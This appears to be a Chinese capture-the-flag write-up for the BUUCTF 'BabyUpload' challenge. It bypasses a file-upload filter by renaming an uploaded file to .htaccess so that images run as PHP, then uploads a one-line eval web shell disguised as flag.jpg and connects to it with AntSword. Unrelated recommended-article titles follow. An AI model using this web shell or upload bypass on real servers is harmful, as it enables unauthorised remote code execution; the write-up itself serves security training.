BUUCTF-web刷题篇(17)

26.BabyUpload

源码:https://github.com/imaginiso/GXY_CTF/tree/master/Web/babyupload

查看题目源码:

写着:SetHandler application/x-httpd-php

通过源码可以看出这道文件上传题目主要还是考察.htaccess配置文件的特性,倘若不先上传.htaccess配置文件,那么后台服务器就无法解析php代码,这个是需要注意的。

.htaccess配置文件特性:

概述来说,.htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

.htaccess配置文件格式

<FileMatch "xxx.jpg>

SetHandler application/x-httpd-php

创建.htaccess配置文件

SetHandler application/x-httpd-php

Kali或者主机创建txt文件输入上面的配置命令,并将其命名为111.jpg文件

上传.htaccess配置文件(111.jpg):

BP抓包:

这里猜测.htaccess文件被过滤,所以不能直接上传.htaccess配置文件,先截断数据包再把上传的111.jpg文件更名为.htaccess文件,如图:

action到repeater,并send,htaccess配置文件上传成功:

上传成功,现在我们的jpg一句话木马文件就可以上传并且可以当作php代码来执行了

创建木马文件

<script language='php'>@eval($_REQUEST['shell']);</script>

在Kali里面创建txt文件,输入以上代码,并将其保存命名为flag.jpg

上传木马文件

action到repeater中,send之后上传成功,访问上传路径链接:

http://b326957d-5245-4605-9d10-cf909d20a176.node5.buuoj.cn:81/upload/88a808fad157cecb392184390efb5967/flag.jpg

并未呈现图片格式,访问成功。

中国蚁剑连接:

连接成功后根目录后找到flag。

相关推荐
跨境卫士情报站31 分钟前
亚马逊地址关联暴雷:新算法下的账号安全保卫战
安全·亚马逊跨境电商
Guheyunyi32 分钟前
安全风险监测系统是什么?内容有哪些?
大数据·人工智能·深度学习·安全·信息可视化
全知科技32 分钟前
API产品升级丨全知科技发布「知影-API风险监测平台」:以AI重构企业数据接口安全治理新范式
大数据·人工智能·科技·安全
吃不得辣条3 小时前
网络安全笔记
笔记·web安全·智能路由器
Goboy3 小时前
弹窗大战15年祭,零信任iOA的枪口,正对准哪吒的方向盘
安全·程序员·产品
Teamhelper_AR3 小时前
AR眼镜:工业4.0时代高风险作业的安全守护者
安全·ar
辉盈防爆散热风扇8 小时前
EC 技术赋能:福佑防爆风扇如何平衡安全与节能?
安全
君鼎13 小时前
安全逆向工程学习路线
安全·逆向·网安
YGY Webgis糕手之路13 小时前
OpenLayers 综合案例-轨迹回放
前端·经验分享·笔记·vue·web
清 晨14 小时前
剖析 Web3 与传统网络模型的安全框架
网络·安全·web3·facebook·tiktok·instagram·clonbrowser